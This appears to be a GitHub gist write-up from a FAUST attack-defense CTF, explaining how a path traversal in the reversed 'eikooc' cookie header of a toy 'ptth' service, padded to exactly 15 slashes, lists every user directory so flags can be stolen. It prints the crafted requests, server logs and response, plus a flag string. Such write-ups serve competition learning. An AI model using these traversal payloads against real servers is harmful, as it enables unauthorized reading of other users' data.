Skip to content

Instantly share code, notes, and snippets.

@vladvis

vladvis/ptth.md

Created May 29, 2019 15:24
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save vladvis/90c492102bdfb05c9b2fa32dedda3f2b to your computer and use it in GitHub Desktop.
Save vladvis/90c492102bdfb05c9b2fa32dedda3f2b to your computer and use it in GitHub Desktop.
Download ZIP
Raw
ptth.md

ptth

We noticed that server logs debug info to the stdout. First idea was path traversal, because server stores files with the names from the requests: path = './' + eikooc + '/' + path Path traversal in the path didn't work at all, but eikooc (reversed cookie) was a user directory. So we sent such payload:

TEG / PTTH\1.1
eikooc: ../

And we got log message:

[PID 19] [] TEG  SERVER

TEG / PTTH\1.1

eikooc: eikooc: ../

found cookie
[PID 20] [] Fucked up cookie. CLIENT

Ok, we checked condition for this message:

if (some_function(some_ptr) == 15)
{
  ...
} else {
  throw_error("Fucked up cookie.");
}

Hmm, it looks like some_function is just strlen and some_ptr is eikooc pointer. And finally we sent such payload (with exactly 15 slashes in the eikooc):

TEG / PTTH\1.1
eikooc: ////////////////////


PTTH\0.1 2 KO
eikooc: ///////////////
eicookh: 093edf9115dc3ca072233b96e38f2752

<html><head>
<title>Index of data</title>
</head><body>
<h1>Index of data</h1>
<a href="./">(Parent Directory)</a><br>
<a href="data/MskBs9WDwWdlj1p">MskBs9WDwWdlj1p</a><br>
</body></html>

Got it! This request lists all usernames and now we can extract all flags the same way as jury does.

Our FB: FAUST_XOlUOAUHYk6BugAAAABMr89BM6YmLUIM

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment